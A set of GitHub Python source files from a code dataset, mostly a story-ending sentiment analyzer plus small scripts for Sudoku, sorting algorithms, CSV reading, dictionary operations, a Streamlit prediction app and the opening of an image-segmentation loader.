at least the key 'posterior'.\n If it has also a 'prior', the latter should be either a list if the prior is a joint prior,\n or simply a value.\n Values are 'strings' that can be found in story_struct such as \"ending\", \"beginning\", etc.\n -sent_traj_counts_array:\n array containing the counts of each sentiment trajectory encountered in training.\n The first columns correspond to the corresponding sentiment of the part of the story,\n last column indicates the number of occurences of this trajectory.\n -sent_condensed_traj_counts_array:\n same as above but with condensed stories (= all context is evaluated at once).\n -save_traj_path:\n path to save the sent_counts\n '''\n\n def __init__(self, sentiment_files_path_dict=None,\n probas_wanted=default_probas,\n sent_traj_counts_path=' ',\n save_traj=True,\n save_traj_path=None,\n force_retrain=False,\n sent_method=default_sent,\n vader_pos_threshold=.05,\n vader_neg_threshold=-.05, **kwargs):\n ''' Note: positive_words & negative words are lists of strings, mpqa_dicts is a list of dict'''\n try:\n self.nlp = spacy.load('en_core_web_sm')\n except OSError:\n print('ERROR: did you install the spacy language model on your computer?' \\\n ' If not do it using eg. : python -m spacy download en_core_web_sm')\n print('INFO: Loading sentiment lists ...')\n self.positive_words, self.negative_words, self.mpqa_dicts \\\n = self.load_sentiment_lexica(sentiment_files_path_dict)\n print('INFO: Done.')\n\n self.sent_traj_counts_dict = {}\n self.sent_condensed_traj_counts_dict = {}\n self.sent_traj_counts_array = None\n self.sent_condensed_traj_counts_array = None\n self.sent_traj_counts_path = dir + sent_traj_counts_path\n self.save_traj = save_traj\n self.save_traj_path = dir + save_traj_path\n self.probas_wanted = probas_wanted\n self.combination_of_methods = sent_method['method']\n self.force_retrain = force_retrain\n\n self.sent_method = sent_method['method']\n\n self.pos_threshold = sent_method.get('pos_threshold',\n vader_pos if sent_method['method'] == 'vader'\n else blob_pos if sent_method['method'] == 'blobtext'\n else 0.001)\n self.neg_threshold = sent_method.get('neg_threshold',\n vader_neg if sent_method['method'] == 'vader'\n else blob_neg if sent_method['method'] == 'blobtext'\n else -0.001)\n\n if save_traj and save_traj_path is None:\n print('ERROR: did not specify saving directory for sentiment traj. They will not be saved')\n self.save_traj = False\n\n def load_sentiment_lexica(self, path_dict):\n positives = self.read_wordlist(path_dict['positive'])\n negatives = self.read_wordlist(path_dict['negative'])\n mpqas = self.read_mpqa(path_dict['mpqa'])\n return positives, negatives, mpqas\n\n def read_wordlist(self, path):\n with open(dir + path, mode='r') as wordlist_file:\n wordlist = []\n for line in wordlist_file:\n if line.startswith(';') or line.startswith('\\n'):\n pass\n else:\n wordlist.append(line[0:-1])\n\n if wordlist == []:\n print('WARNING : could not parse {}. No words retrieved.'.format(path))\n\n return wordlist\n\n def read_mpqa(self, path):\n with open(dir + path, mode='r') as file:\n wordlist = []\n for line in file:\n if line.startswith(';') or line.startswith('\\n'):\n pass\n else:\n splited = line.split(' ')\n dict = {}\n for arg in splited:\n key, value = arg.split('=')\n if value.endswith('\\n'):\n value = value[:-1]\n dict[key] = value\n wordlist.append(dict)\n\n return wordlist\n\n def story2sent(self, story, combination_of_methods=None, return_normalized=True, **kwargs):\n story_sent = []\n vader_sent = []\n blobtext_sent = []\n if combination_of_methods == None:\n combination_of_methods = self.combination_of_methods\n\n if self.sent_method == 'vader':\n analyzer = SentimentIntensityAnalyzer()\n for seg in story:\n vader_sent.append(analyzer.polarity_scores(seg)['compound'])\n return self.categorize(vader_sent,\n self.pos_threshold,\n self.neg_threshold) if return_normalized else vader_sent\n elif self.sent_method == 'blobtext':\n for seg in story:\n blobtext_sent.append(TextBlob(seg).sentiment.polarity)\n return self.categorize(blobtext_sent,\n self.pos_threshold,\n self.neg_threshold) if return_normalized else blobtext_sent\n\n else:\n for seg in story:\n pos, neg, pos_mpqa, neg_mpqa = 0, 0, 0, 0\n seg_parsed = self.nlp(seg)\n for sentence in seg_parsed.sents:\n for token in sentence:\n if token.pos_ in ['ADP', 'AUX', 'DET', 'NUM', 'PRON',\n 'PROPN', 'PUNCT', 'SCONJ', 'SYM', 'SPACE']:\n continue\n negated = self.is_negated(token)\n if token.lemma_ in self.positive_words:\n if negated:\n neg = neg + 1\n else:\n pos = pos + 1\n if token.lemma_ in self.negative_words:\n if negated:\n pos = pos + 1\n else:\n neg = neg + 1\n\n # search if in mpqa list\n if kwargs.get('lock_pos', False):\n mpqa_dict = next((dict for dict in self.mpqa_dicts\n if (dict['word1'] == token.lemma_\n and (dict['pos1'] == 'anypos' or\n dict['pos1'] == self.transl(token.pos_)))), None)\n else:\n mpqa_dict = next((dict for dict in self.mpqa_dicts if dict['word1'] == token.lemma_), \\\n None)\n if mpqa_dict is not None:\n if mpqa_dict['priorpolarity'] == 'positive':\n if negated:\n neg_mpqa = neg_mpqa + 1\n else:\n pos_mpqa = pos_mpqa + 1\n if mpqa_dict['priorpolarity'] == 'negative':\n if negated:\n pos_mpqa = pos_mpqa + 1\n else:\n neg_mpqa = neg_mpqa + 1\n\n seg_sent = pos - neg\n seg_sent_mpqa = pos_mpqa - neg_mpqa\n story_sent.append([seg_sent, seg_sent_mpqa])\n story_sent = self.combine_sentiment_methods(story_sent, combination_of_methods,\n return_normalized=return_normalized)\n #print('story sent: {}' .format(story_sent))\n print('vader: {}'.format(vader_sent))\n return story_sent\n\n def categorize(self, array, pos_threshold, neg_threshold):\n return list(map(int, [1 if sent > pos_threshold else -1 if sent < neg_threshold else 0 for sent in array]))\n\n\n def is_negated(self, token):\n negated_token = False\n if 'neg' in [child.dep_ for child in token.children]:\n negated_token = True\n return negated_token\n\n\n def transl(self, pos):\n pos_name = {\n 'ADV': 'adverb',\n 'VERB': 'verb',\n 'NOUN': 'noun',\n 'ADJ': 'adj'\n }\n return pos_name.get(pos, 'else')\n\n\n def combine_sentiment_methods(self, story_sent, combination='average', return_normalized=True):\n story_sent = np.asarray(story_sent)\n if combination == 'average':\n story_sent = np.sum(story_sent, axis=1)\n if combination == 'binglui':\n story_sent = np.sign(story_sent[:,0])\n if combination == 'mpqa':\n story_sent = np.sign(story_sent[:, 1])\n if return_normalized:\n return np.sign(story_sent)\n else:\n return story_sent\n\n def sent_traj_to_str(self, sent):\n return \" \".join(str(x) for x in sent)\n\n def train(self, train_stories_list, **kwargs):\n '''\n This function trains a sentiment_analyzer either by loading precomputed counts arrays\n or on given training story list.\n If a saving path has been specified, it will automatically save the counts arrays for next time.\n\n :param train_stories_list:\n list of training stories\n :return:\n '''\n if Path(self.sent_traj_counts_path).exists() and not self.force_retrain:\n print(\"INFO: found file with sentiment trajectories counts in {}.\" \\\n \" Loading array from file instead of training.\" \\\n .format(self.sent_traj_counts_path))\n with np.load(self.sent_traj_counts_path) as data:\n self.sent_traj_counts_array = data['sent_traj_counts_array']\n self.sent_condensed_traj_counts_array = data['sent_condensed_traj_counts_array']\n else:\n print(\"INFO: Did not find file with pretrained sentiment trajectories.\" \\\n \"Training ngram model on {} stories\" .format(len(train_stories_list)))\n i = 0\n for train_story in train_stories_list:\n i = i + 1\n if i % 50 == 0:\n print(\"INFO: Processing story {}\".format(i))\n sentiment = self.story2sent(train_story, **kwargs)\n #print(train_story)\n sentiment_condensed = self.story2sent(train_story, return_normalized=False, **kwargs)\n sentiment_condensed = np.sign([np.sum(sentiment_condensed[0:story_struct['ending']]),\n sentiment[story_struct['ending']]])\n #not condensed\n if self.sent_traj_to_str(sentiment) in self.sent_traj_counts_dict:\n self.sent_traj_counts_dict[self.sent_traj_to_str(sentiment)] = \\\n self.sent_traj_counts_dict[self.sent_traj_to_str(sentiment)] + 1\n else:\n self.sent_traj_counts_dict[self.sent_traj_to_str(sentiment)] = 1\n\n #condensed\n if self.sent_traj_to_str(sentiment_condensed) in self.sent_condensed_traj_counts_dict:\n self.sent_condensed_traj_counts_dict[self.sent_traj_to_str(sentiment_condensed)] = \\\n self.sent_condensed_traj_counts_dict[self.sent_traj_to_str(sentiment_condensed)] + 1\n else:\n self.sent_condensed_traj_counts_dict[self.sent_traj_to_str(sentiment_condensed)] = 1\n i = 0\n #not condensed\n for traj, val in self.sent_traj_counts_dict.items():\n row = np.concatenate((np.fromstring(traj, dtype=np.int, sep=' '),\n np.array([val])))\n if i == 0:\n self.sent_traj_counts_array = row\n else:\n self.sent_traj_counts_array = np.vstack((self.sent_traj_counts_array,\n row))\n i = i + 1\n\n #condensed\n i = 0\n for traj, val in self.sent_condensed_traj_counts_dict.items():\n row = np.concatenate((np.fromstring(traj, dtype=np.float, sep=' '),\n np.array([val])))\n if i == 0:\n self.sent_condensed_traj_counts_array = row.astype(np.int)\n else:\n self.sent_condensed_traj_counts_array= np.vstack((self.sent_condensed_traj_counts_array,\n row.astype(np.int)))\n i = i + 1\n\n if self.save_traj:\n try:\n np.savez_compressed(self.save_traj_path ,\n sent_traj_counts_array=self.sent_traj_counts_array,\n sent_condensed_traj_counts_array=self.sent_condensed_traj_counts_array)\n except FileNotFoundError:\n f = open(self.save_traj_path , 'w')\n f.close()\n\n def predict_proba(self, eval_stories_list, probas_wanted=None, predict_neutral=False, **kwargs):\n '''\n This function predicts probabilities\n :param eval_stories_list:\n :param probas_wanted:\n :return:\n '''\n #note: two last columns have to be \"ending 1 and ending2\"\n if probas_wanted == None:\n probas_wanted = self.probas_wanted\n print(\"INFO: Model predicting the following probabilities: {}\".format(probas_wanted))\n\n if self.sent_traj_counts_array is None:\n raise Exception(\"Model not trained. Please train model first.\")\n proba_features = []\n\n if not predict_neutral:\n print(\"Removing neutral endings...\" , end='')\n self.sent_condensed_traj_counts_array = \\\n self.sent_condensed_traj_counts_array[self.sent_condensed_traj_counts_array[:, 1] != 0]\n self.sent_traj_counts_array = \\\n self.sent_traj_counts_array[self.sent_traj_counts_array[:, story_struct['ending']] != 0]\n print(\"Done.\")\n\n i = 0\n for story in eval_stories_list:\n if i % 50 == 0:\n print(\"Predicting story {}/{}\".format(i, len(eval_stories_list)))\n i += 1\n\n story_sent = self.story2sent(story, return_normalized=False)\n print(story)\n print(story_sent)\n #make sure the two endings are in story_sent: note: normally 4 dims in array but + counts = 5\n assert len(story_sent) == self.sent_traj_counts_array.shape[1]\n\n for ending in [len(story_sent) - 1, len(story_sent) - 2]:\n story_proba_features = []\n # if ending is neutral, send 0 proba back (?!)\n\n masked_sent_story = np.asarray([x for i, x in enumerate(story_sent) if i != ending])\n for proba in probas_wanted:\n if 'prior' in proba:\n if isinstance(proba['prior'], list):\n proba_val = self.calc_proba_prior(np.sign(masked_sent_story),\n story_struct[proba['posterior']],\n [story_struct[prior] for prior in proba['prior']])\n elif proba['prior'] == 'context':\n context_sent = np.sign(np.sum(masked_sent_story[0:story_struct['ending']]))\n condensed_sent = np.array([context_sent,\n np.sign(masked_sent_story[story_struct['ending']])])\n # 0 because since size of array changed,\n # just let know that should take ending as posterior last element (= ending)\n proba_val = self.calc_proba_prior(condensed_sent, 1, 0,\n self.sent_condensed_traj_counts_array)\n else:\n proba_val = self.calc_proba_prior(np.sign(masked_sent_story),\n story_struct[proba['posterior']],\n story_struct[proba['prior']])\n\n else:\n proba_val = self.calc_proba_no_prior(np.sign(masked_sent_story),\n story_struct[proba['posterior']])\n# print(\"Proba {}: {}\" .format(proba, proba_val))\n story_proba_features.append(proba_val)\n proba_features.append(story_proba_features)\n\n proba_features = np.asarray(proba_features).reshape(((-1,\n 2 * (self.sent_traj_counts_array.shape[1]-1))))\n return proba_features[:, :self.sent_traj_counts_array.shape[1]-1], \\\n proba_features[:, self.sent_traj_counts_array.shape[1]-1:]\n\n\n def calc_proba_no_prior(self, sent_story, idx, array=None):\n if array is None:\n array = self.sent_traj_counts_array\n\n masked_sent_array = self.mask_sent_array(array, sent_story[idx], idx)\n if masked_sent_array.size == 0:\n #print('WARNING: could not find the probability. Will return 0')\n return 0\n else:\n return np.sum(masked_sent_array[:,-1]) / np.sum(array[:, -1])\n\n\n def calc_proba_prior(self, sent_story, sent_idx, prior_idx, array=None):\n if array is None:\n array = self.sent_traj_counts_array\n masked_sent_array = self.mask_sent_array(array,\n sent_story[prior_idx],\n prior_idx)\n return self.calc_proba_no_prior(sent_story,\n sent_idx,\n masked_sent_array)\n\n\n def mask_sent_array(self, array, value, idx):\n if isinstance(idx, int):\n mask = array[:, idx] \\\n == np.multiply(np.ones(array.shape[0],\n dtype=np.int), value)\n else:\n mask = np.all(array[:, idx] == np.multiply(np.ones((array.shape[0], len(idx)),\n dtype=np.int), value), axis=1)\n return array[mask]\n\n\n def get_sent_endings(self, stories_list):\n sent_endings = []\n for story in stories_list:\n sent_endings.append(self.story2sent(story,\n return_normalized=False)[-2:])\n return np.asarray(sent_endings)\n\n\n def generate_bin_features(self, probas_ending1, probas_ending2):\n comparison = np.ones(probas_ending1.shape)\n comparison[probas_ending1 < probas_ending2] = -1\n return comparison\n\n\n def generate_neutral_features(self, probas_ending1, probas_ending2):\n n1 = np.all(probas_ending1[..., :] == 0, axis=1).astype(np.int)\n n2 = np.all(probas_ending2[..., :] == 0, axis=1).astype(np.int)\n return np.expand_dims(n1, 1), np.expand_dims(n2,1)\n\n\n def generate_diff_sent_features(self, probas_ending1, probas_ending2,\n exclude_neutral=False):\n diff = np.expand_dims(np.any(probas_ending1[:, ...] != probas_ending2[:, ...], axis=1), 1)\n\n if not exclude_neutral:\n return diff.astype(np.int)\n else:\n n1, n2 = self.generate_neutral_features(probas_ending1,\n probas_ending2)\n if not np.any(n1) or not np.any(n2):\n print(\"WARNING: you requested to exclude neutral in diff_sent extra \"\n \"features, but there are no neutral endings. The result will be \"\n \"the same as if you didn't ask to exclude neutrals.\")\n #remove \"true values\" of diff array if ending1 or 2 is neutral\n temp = np.logical_and(np.logical_not(n1.astype(np.bool)), diff)\n diff_excl_neutr = np.logical_and(np.logical_not(n2.astype(np.bool)),\n temp)\n return diff_excl_neutr.astype(np.int)\n\n\n def generate_extra_features(self, probas_ending1, probas_ending2,\n features, stories_list=None, indices=[0, 4]):\n extra = []\n print(\"Adding requested extra features: {}\" .format(features))\n if 'bin' in features:\n b = self.generate_bin_features(probas_ending1,\n probas_ending2)\n extra.append(b)\n\n if 'neutral' in features:\n # Note: if predict_neutral was activated during predict_proba,\n # this feature will be useless\n n1, n2 = self.generate_neutral_features(probas_ending1,\n probas_ending2)\n if not np.any(n1) or not np.any(n2):\n print(\"WARNING: did not find any neutral ending. \"\n \"You asked for adding neutral_features while probably keeping\"\n \" predict_neutral as True. I will not add any neutral feature\"\n \" as it would be useless.\")\n else:\n extra.append(n1)\n extra.append(n2)\n\n if 'diff_sent_endings' in features:\n d = self.generate_diff_sent_features(probas_ending1,\n probas_ending2)\n extra.append(d)\n if 'diff_sent_endings_exclude_neutral' in features:\n dnn = self.generate_diff_sent_features(probas_ending1,\n probas_ending2,\n exclude_neutral=True)\n extra.append(dnn)\n if 'sent_endings' in features:\n extra.append(self.get_sent_endings(stories_list))\n\n return np.hstack(extra)\n\n\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('data_path', type=str,\n help=\"path to the stories\")\n parser.add_argument('output_path', type=str, help=\"path to the output file\")\n parser.add_argument('config', type=str, help='path to config file')\n parser.add_argument('test_file_name', type=str, help='choose between val_stories.csv, ' \n 'test_stories.csv, or test_nlu18.csv')\n# parser.add_argument('--pretrained_traj_path', type=str, help='Path to file containing array' \\\n# 'of \"counts\" of sentiment trajectories')\n# parser.add_argument('--save_traj_path', type=str, help=\"path to store sentiment_trajectories of model.\" \\\n# \" By default is the same as pretrained_traj_path\")\n# parser.add_argument('--force_retrain', type=bool)\n args = parser.parse_args()\n\n # Load the stories, process them and compute their word embedding\n print('Loading stories according to parsing instructions: {}'.format(train_parsing_instructions))\n train_stories = load_stories(args.data_path + '/train_stories.csv',\n train_parsing_instructions)\n print(\"Train Stories loaded.\")\n if args.test_file_name == 'val_stories.csv':\n print('Loading stories according to parsing instructions: {}'.format(eval_parsing_instructions))\n test_stories = load_stories(args.data_path + '/val_stories.csv',\n eval_parsing_instructions)\n print(\"Eval Stories loaded.\")\n elif args.test_file_name == 'test_nlu18.csv':\n print('Loading stories according to parsing instructions: {}'.format(test_parsing_instructions))\n test_stories = load_stories(args.data_path + '/test_nlu18.csv',\n test_parsing_instructions, header=False)\n print(\"Test NLU 18 Stories loaded.\")\n elif args.test_file_name == 'test_stories.csv':\n print('Loading stories according to parsing instructions: {}'.format(eval_parsing_instructions))\n test_stories = load_stories(args.data_path + '/test_stories.csv',\n eval_parsing_instructions)\n print(\"STC Test Stories loaded.\")\n\n with open(args.config, 'r') as f:\n config = yaml.load(f)\n print(\"Config: {}\".format(config))\n sentiment_analyzer = SentimentAnalyzer(**config)\n start = tm.datetime.now()\n sentiment_analyzer.train(train_stories[0:config.get('n_train_max', None)], **config)\n print('Training time: \\n{}' .format(tm.datetime.now() - start))\n print('Traj counts: {} \\n Traj condensed counts: \\n{}'\\\n .format(sentiment_analyzer.sent_traj_counts_array,\n sentiment_analyzer.sent_condensed_traj_counts_array))\n\n start = tm.datetime.now()\n print('Computing probabilities ...')\n proba_ending1, \\\n proba_ending2 = sentiment_analyzer.predict_proba(test_stories[0:config.get('n_test_max',\n None)], **config)\n extra_features = sentiment_analyzer.generate_extra_features(proba_ending1,\n proba_ending2,\n config.get('extra_features',\n ['bin']))\n print(extra_features)\n # Compute the topic similarity between the endings and the context\n print(proba_ending1, proba_ending2)\n print(\"Done. Time for prediction: {}\" .format(tm.datetime.now() - start))\n\n # Write the features to a .npz file\n np.savez_compressed(args.output_path,\n sentiment_ending1=proba_ending1,\n sentiment_ending2=proba_ending2,\n extra_features=extra_features)\n\n\n print(\"Sentiment features stored in \" + args.output_path)\n","repo_name":"nathlacroix/NLP-Adventures","sub_path":"task2/sentiment_analysis.py","file_name":"sentiment_analysis.py","file_ext":"py","file_size_in_byte":29394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1800505044","text":"\"\"\"\n@author: Ollie\n\"\"\"\n\nfrom SudokuGUI import *\n\n\ndef main():\n \"\"\"\n Main function to run through program \n \"\"\"\n game = gui()\n pygame.init()\n game.setup() \n while True: \n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n pygame.display.update()\n game.button_click() \nmain()\n","repo_name":"ojsellers/sudoku","sub_path":"SudokuOperator.py","file_name":"SudokuOperator.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4062230146","text":"import csv\n\nfilename = \"my_table.csv\"\ncolumn_name = \"Price\"\n\n# Open the CSV file for reading\nwith open(filename, \"r\") as file:\n reader = csv.DictReader(file)\n\n # Loop over each row in the CSV file\n for row in reader:\n # Extract the value in the specified column\n value = row[column_name]\n\n # Do something with the value, e.g. print it\n print(value)","repo_name":"Mayankkhannaaa/data-collection-scraping-and-preProcessing","sub_path":"arrayCreation.py","file_name":"arrayCreation.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28493996435","text":"altura = float(input(\"digite sua altura: \"))\npeso = float(input(\"digite seu peso: \"))\n\nimc = peso / (altura*altura)\n\nif (imc < 18.6):\n print(\"Você está abaixo do peso ideal.\")\nelif (18.6 <= imc <= 24.9):\n print(\"Você está no seu peso ideal\")\nelif(25 <= imc <= 29.9):\n print(\"Você esta acima do seu peso ideal.\")\nelse:\n print(\"Você está obeso.\")","repo_name":"MatheusMMarques/Condicionais-e-Arrays---Python","sub_path":"Condicionais.py","file_name":"Condicionais.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39960987538","text":"import random\n\ndef quick_sort(items):\n if len(items) <= 1:\n return items\n\n pivot = items[0]\n lt = quick_sort([item for item in items[1:] if item < pivot])\n gte = quick_sort([item for item in items[1:] if item >= pivot])\n return lt + [pivot] + gte\n \n\ndef test_quick_sort():\n my_list = random.sample(range(-100, 100), 10)\n assert quick_sort(my_list) == sorted(my_list)\n print('sorting: {}'.format(my_list))\n print('sorted :{}'.format(quick_sort(my_list)))\n\nif __name__ == \"__main__\":\n test_quick_sort()","repo_name":"rastgeleo/python_algorithms","sub_path":"sorting/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8088366524","text":"# sorting algorithm\n\n# binary search\n# - 오름차순으로 정렬된 리스트를 반씩 줄여가면서 서치하는 것\n\n# 1. selection algorithm O(N**2)\n# 정렬되지 않은 원소 중에서 매번 가장 작은 값을 선택해서 swap\n# 0번째 원소를 가장 작은 수로 세팅해놓고 전체 배열을 순회하면서 가장 작은 수를 찾아서 swap 을 해준다.\narray = [1, 5, 3, 6, 8, 4, 7, 9, 0, 2]\ndef selection(arr):\n for i in range(len(arr)):\n min_idx = i\n for j in range(i + 1, len(arr)):\n if arr[min_idx] > arr[j]:\n min_idx = j\n # 아래와 같은 코드를 작성하면 두 원소의 위치가 swap 됨\n arr[i], arr[min_idx] = arr[min_idx], arr[i]\n print(arr)\n\n# 2. insertion sort O(N*2)\n# 0번째는 가장 작다는 전제 안에서 1번째부터 시작해서 왼쪽에 있는 값을 확인 하고 1번째 보다 작으면 swap\ndef insertion(arr):\n for i in range(1, len(arr)):\n for j in range(i, 0, -1):\n if arr[j] < arr[j-1]: # 한 칸 왼쪽으로 이동\n arr[j], arr[j-1] = arr[j-1], arr[j]\n else: # 자기보다 작은 데이터를 만나면 그 위치에서 멈춤\n break\n print(arr)\n\n# 3. Quick sort O(n log n) || pivot 설정 실패에 따른 worst cast: O(N**2)\n# arr, start = 0, end = len(array)-1\n# 배열의 0번째 원소를 pivot 으로 지정 -> pivot의 바로 다음 원소를 left, 맨 마지막 원소(배열의 끝)를 right로 지정해서 left엔 pivot 보다 작은, right엔 큰 애들로 분리한다.\n# 만약 각 방향에서 이 규칙을 따르지 않는 원소를 찾게 되면 두 원소를 swap 시켜준다.\n# pivot 보다 작은 원소 큰 원소로 그룹이 나뉘였으면 pivot과 left 그룹의 가장 마지막 원소와 swap 한다.\n# 각 그룹에서 또 다시 가장 첫번째 원소를 pivot으로 지정하고 그룹마다 quick sort를 실행 시켜준다. 🔁\narray = [26, 25, 24, 9, 16, 37, 34, 59, 68]\n\ndef quick(arr, start, end):\n if start >= end:\n return\n pivot = start\n left = start + 1\n right = end\n while left <= right:\n # 피벗보다 큰 데이터를 찾을 때 까지 반복\n while left <= end and arr[left] <= arr[pivot]:\n left += 1\n # 피벗보다 작은 데이터를 찾을 때 까지 반복\n while right > start and arr[right] >= arr[pivot]:\n right -= 1\n # 서로 엇갈렸다면\n if left > right:\n print(left, right)\n arr[right], arr[pivot] = arr[pivot], arr[right]\n # 엇갈리지 않았다면 작은 데이터와 큰 데이터를 교체\n else:\n arr[left], arr[right] = arr[right], arr[left]\n # 분할 이후 왼쪽 부분과 오른쪽 부분 각각에 대해 퀵 정렬 수행\n print(arr)\n quick(arr, start, right - 1)\n quick(arr, right + 1, end)\n\nquick(array, 0, len(array) - 1)\n","repo_name":"shinyuna/algorithm_study","sub_path":"sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"37754092851","text":"# Write a program to perform following dictionary operations given below:\r\n# 1. Access Item\r\n# 2. Change Item\r\n# 3. Add Item\r\n# 4. Remove Item\r\n\r\n\r\n\r\ndef access(v_dict):\r\n for key,item in v_dict.items():\r\n print(item)\r\n\r\ndef change(v_dict):\r\n item = int(input(\"Enter the item key whose value to be changed: \"))\r\n value = input(\"Enter the value to be replaced : \")\r\n \r\n for index in v_dict:\r\n if index == item:\r\n v_dict[item] = value\r\n \r\n print(v_dict)\r\n \r\ndef add(v_dict):\r\n key = int(input(\"Enter the key to be added: \"))\r\n value = input(\"Enter the associated value for the key : \")\r\n v_dict[key]=value\r\n print(v_dict)\r\n \r\n\r\ndef remove(v_dict):\r\n key = int(input(\"Enter the key for the item pair to be removed: \"))\r\n del v_dict[key]\r\n print(v_dict)\r\n \r\n\r\n\r\ndict1 = {1:\"one\",2:\"two\",3:\"three\",4:\"four\",5:\"five\"}\r\n\r\nch = int(input(\"Choose operation:\\n1. Access Item \\n2. Change Item\\n3. Add Item\\n4. Remove Item\\n\"))\r\n\r\nif ch==1:\r\n access(dict1)\r\nelif ch==2:\r\n change(dict1)\r\nelif ch==3:\r\n add(dict1)\r\nelse:\r\n remove(dict1)","repo_name":"tejasgolhar2/python-basic-to-advanced","sub_path":"Advanced Programming - 7th Sem/3. Question Bank Problems/Unit 2/07_dictionary_operations.py","file_name":"07_dictionary_operations.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35454427987","text":"import streamlit as st \r\nimport joblib \r\nfrom streamlit_option_menu import option_menu\r\nfrom streamlit_lottie import st_lottie\r\nimport pandas as pd\r\nimport json\r\nimport sklearn\r\n\r\nhouse_price = joblib.load(r\"C:\\Users\\Anmino\\Desktop\\Machine-Learning_2\\Linear_Regression\\usa_house_pricing.pkl\")\r\nheart_fail_model = joblib.load(r\"C:\\Users\\Anmino\\Desktop\\Machine-Learning_2\\Logistic_Regression\\heart_failure_clinical_records_datase.pkl\")\r\n\r\ndef load_lottyfile(filepath:str):\r\n with open(filepath,'r') as f:\r\n return json.load(f)\r\n\r\nhouse_price_pred_img = load_lottyfile('house.json')\r\n\r\n\r\ndef main():\r\n select = option_menu(menu_title=None,\r\n options=['Home','Project','About'],\r\n icons=['house','laptop','book'],\r\n orientation='horizontal')\r\n \r\n if select=='Project':\r\n model_type1 = ['House Price','Heart Failure']\r\n model_type = st.sidebar.selectbox(\"📚Project's\",model_type1)\r\n \r\n try:\r\n if model_type=='House Price':\r\n col1,col2,col3 = st.columns([1,2,1])\r\n #with col2:\r\n #st_lottie(house_price_pred_img,width=300,height=200,quality='high')\r\n col1,col2 = st.columns([1,1])\r\n \r\n with col1:\r\n avg_area_income = st.text_input('Area Income')\r\n with col2:\r\n avg_area_house_age = st.text_input('House Age')\r\n with col1:\r\n area_number_of_rooms = st.text_input('Number of Rooms')\r\n with col2:\r\n number_of_bedrooms = st.text_input('Number of Bedrooms')\r\n with col1:\r\n area_population = st.text_input('Area Population')\r\n \r\n with col1:\r\n submit_button = st.button('Predict')\r\n if submit_button:\r\n pred = house_price.predict([[avg_area_income,\r\n avg_area_house_age,\r\n area_number_of_rooms,\r\n number_of_bedrooms,\r\n area_population]])\r\n st.success(f\"🤖Prediction: {pred[0]}\")\r\n #2nd project \r\n elif model_type==\"Heart Failure\":\r\n with st.form('form1',clear_on_submit=True):\r\n col1,col2,col3 = st.columns([1,1,1])\r\n with col1:\r\n age = st.text_input('Age')\r\n \r\n with col2:\r\n an = ['Select',1,0]\r\n anaemia = st.selectbox('Anaemia',an)\r\n with col3:\r\n creatinine_phosphokinase = st.text_input('Creatinine Phosphokinase')\r\n with col1:\r\n diabetes_box = ['Select',0,1]\r\n diabetes = st.selectbox('Diabetes',diabetes_box)\r\n with col2:\r\n ejection_fraction = st.text_input(\"Ejection Fraction\")\r\n with col3:\r\n high_blood_pressure_box = [\"Select\",0,1]\r\n high_blood_pressure = st.selectbox('High Blood Pressure',high_blood_pressure_box)\r\n with col1:\r\n platelets = st.text_input(\"Platelets\")\r\n with col2:\r\n serum_creatinine = st.text_input(\"Serum Creatinine\")\r\n with col3:\r\n serum_sodium = st.text_input(\"Serum Sodium\")\r\n with col1:\r\n gender = [\"Select\",'1',\"0\"]\r\n sex = st.selectbox(\"Gender\",gender)\r\n with col2:\r\n smoking_box = [\"Select\",1,0]\r\n smoking = st.selectbox(\"Smoking\",smoking_box) \r\n with col3:\r\n time = st.slider(\"Smoking Per/Day\",1,300) \r\n with col1:\r\n button = st.form_submit_button(\"Predict\")\r\n if button:\r\n model_pred = heart_fail_model.predict([[age,\r\n anaemia,\r\n creatinine_phosphokinase,\r\n diabetes,\r\n ejection_fraction,\r\n high_blood_pressure,\r\n platelets,\r\n serum_creatinine,\r\n serum_sodium,\r\n sex,\r\n smoking,\r\n time]])\r\n st.success(f\"🤖Prediction: {model_pred[0]}\") \r\n \r\n except:\r\n st.warning('❗Please enter the correct value for prediction...')\r\n \r\n \r\n \r\n\r\nif __name__=='__main__':\r\n main()\r\n\r\n","repo_name":"Anmol2121/Streamlit_Heart_Fail_project","sub_path":"heart_fail_predict.py","file_name":"heart_fail_predict.py","file_ext":"py","file_size_in_byte":4901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30702766119","text":"\"\"\"\r\nCreated on Sat Mar 3 18:38:30 2019\r\n\r\nData processing for robotic Multiple image segmentation with ConvLSTM Unet model\r\n\r\n@author: YONG Huawei\r\n\"\"\"\r\nfrom keras.models import *\r\nfrom keras.layers import *\r\nfrom keras.optimizers import *\r\nfrom keras.callbacks import ModelCheckpoint\r\nfrom keras.layers.convolutional_recurrent import ConvLSTM2D\r\nfrom keras import backend as K\r\nfrom PIL import Image\r\nfrom imgaug import augmenters as iaa\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport os\r\nimport cv2\r\n\r\nos.environ['CUDA_VISIBLE_DEVICES'] = '1'\r\n\r\noriginal_height, original_width = 1080, 1920\r\nheight, width = 1024, 1280\r\nh_start, w_start = 28, 320\r\n\r\n\r\ndef read_img(path, target_size, color_mode, multi_mask=False, num_class=1):\r\n try:\r\n img = Image.open(path).convert(color_mode)\r\n except Exception as e:\r\n print(e)\r\n else: # this part can function only if the try is processing successfully\r\n img_arry = np.array(img)\r\n img_new = img_arry[h_start:h_start + height, 